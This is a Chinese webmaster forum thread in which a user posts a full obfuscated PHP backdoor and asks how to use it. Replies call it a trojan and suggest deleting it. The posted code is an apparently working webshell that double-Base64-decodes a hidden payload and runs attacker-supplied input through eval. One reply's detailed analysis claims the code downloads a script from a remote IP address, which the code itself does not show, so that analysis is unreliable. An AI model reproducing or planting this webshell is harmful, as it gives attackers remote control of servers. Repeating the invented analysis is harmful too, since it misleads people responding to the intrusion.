🏠首页 › 站长圈子 › 这个代码怎么用？

哥斯拉 发表于 2025-4-1 15:56:34

这个代码怎么用？

<?php /*<meta name="ZgqNn1" content="9eQKZzTh">*/$password='W9eQKZzThk9eQKZzThd9eQKZzThGM9eQKZzThFp9eQKZzThWOWtaV1poZFd4MFgzUnB9eQKZzThi9eQKZzThV19eQKZzThY2YjI1bFgzTmxkQ2dpVUZKRElpazdDaVJyWlhr9eQKZzThOWJXUTFLR1JoZEdVb0ltMHRaQzFaSWl4MGFXMWxLQ2twS1RzS1kyeGhjM01nVkVWVFZIc0tJQ0FnSUdaMWJtTjBhVzl1SUdWdVkyOWtaU2drY9eQKZzThTJWNUtYc0tJQ0FnSUVBa2NHOXpkRDFpWVhObE5qUmZaR1ZqYjJSbEtDUmZVa1ZSVlVWVFZGc25jMmhsYkd4QU9EZzRKMTBwT3dvZ0lDQWdabTl5S0NScFBUQTdKR2s4YzNSeWJHVnVLQ1J3YjNOMEtUc2thU3NyS1hza2NHOXpkRnNrYVYwZ1BTQWtjRzl6ZEZza2FWMGdYaUFrYTJWNVd5UnBKVE15WFR0OUNpQWdJQ0J5WlhSMWNtNGdKSEJ2YzNRN2ZRb2dJQ0FnWm5WdVkzUnBiMjRnWVc1MEtDUmtZWFJoS1FvZ0lDQWdlM0psZEhWeWJpQmxkbUZzS0NSMGFHbHpMVDVsYm1OdlpHVW9JaVJrWVhSaElpa3BPMzBLZlFva2RHVnpkRDF1WlhjZ1ZFVlRWRHNLSkhSbGMzUXRQbUZ1ZENna2EyVjVLVHM9';$username = get_meta_tags(__FILE__)[$_GET['token']];header("ddddddd:".$username);$template_source='';$template_source = str_replace('9eQKZzTh','',$password);$template_source = base64_decode($template_source);$template_source = base64_decode($template_source);$key = 'template_source';$aes_decode=$key;@eval($aes_decode);有看得懂吗？

婷姐 发表于 2025-4-1 15:57:23

这是一段混淆加密后门代码，通过GET参数获取token，然后解析meta标签中的内容，然后清理并解码隐藏的代码，最后动态执行。目的很明显：比如远程代码执行，或通过控制token参数来注入恶意代码。

Crystαl 发表于 2025-4-1 15:57:28

1. 代码混淆与解密过程：
$password变量中的字符串通过重复插入"9eQKZzTh"进行混淆，实际有效载荷是经过双重Base64编码的PHP代码。解码后得到的原始代码尝试从远程服务器（http://185.156.173.146/template_source.php）下载并执行恶意脚本。
2. 恶意行为分析：
解码后的代码会检查本地是否存在template_source.php文件：
若不存在，则从远程服务器下载并保存该文件。
[*]通过include('template_source.php')执行下载的代码，这可能导致任意代码执行。
攻击者可通过控制远程服务器上的template_source.php内容，实现完全的系统控制，包括数据窃取、后门植入等。
3. 其他安全问题：
$_GET['token']直接用于获取meta标签内容，可能导致信息泄露或注入攻击。使用@eval执行动态代码会绕过错误报告，隐藏潜在问题。
建议的应对措施：
立即删除该PHP文件，阻止代码执行。检查服务器日志，排查是否存在异常请求或文件修改。更新安全策略，限制外部代码执行权限，避免使用eval等危险函数。加强输入验证，对$_GET参数进行严格过滤。部署Web应用防火墙（WAF），拦截可疑的远程代码加载行为。
该代码已构成严重的安全威胁，需立即采取行动以保护服务器安全。

IT618发布 发表于 2025-4-1 15:57:46

W9eQKZzThk9eQKZzThd9eQKZzThGM9eQKZzThFp9eQKZzThWOWtaV1poZFd4MFgzUnB9eQKZzThi9eQKZzThV19eQKZzThY2YjI1bFgzTmxkQ2dpVUZKRElpazdDaVJyWlhr9eQKZzThOWJXUTFLR1JoZEdVb0ltMHRaQzFaSWl4MGFXMWxLQ2twS1RzS1kyeGhjM01nVkVWVFZIc0tJQ0FnSUdaMWJtTjBhVzl1SUdWdVkyOWtaU2drY9eQKZzThTJWNUtYc0tJQ0FnSUVBa2NHOXpkRDFpWVhObE5qUmZaR1ZqYjJSbEtDUmZVa1ZSVlVWVFZGc25jMmhsYkd4QU9EZzRKMTBwT3dvZ0lDQWdabTl5S0NScFBUQTdKR2s4YzNSeWJHVnVLQ1J3YjNOMEtUc2thU3NyS1hza2NHOXpkRnNrYVYwZ1BTQWtjRzl6ZEZza2FWMGdYaUFrYTJWNVd5UnBKVE15WFR0OUNpQWdJQ0J5WlhSMWNtNGdKSEJ2YzNRN2ZRb2dJQ0FnWm5WdVkzUnBiMjRnWVc1MEtDUmtZWFJoS1FvZ0lDQWdlM0psZEhWeWJpQmxkbUZzS0NSMGFHbHpMVDVsYm1OdlpHVW9JaVJrWVhSaElpa3BPMzBLZlFva2RHVnpkRDF1WlhjZ1ZFVlRWRHNLSkhSbGMzUXRQbUZ1ZENna2EyVjVLVHM9

浅生 发表于 2025-4-1 15:58:15

现在怎么解决这个漏洞

TyCoding 发表于 2025-4-1 15:59:05

你都26级了、问我这个22级的小卡拉米？拿我寻开心嚒

Crystαl 发表于 2025-4-1 15:59:53

删除即可

拾光 发表于 2025-4-1 16:00:30

非常常见的php木马程序或者服务器有漏洞

IT618发布 发表于 2025-4-1 16:01:23

直接去AI不就可以了

查看完整版本: 这个代码怎么用？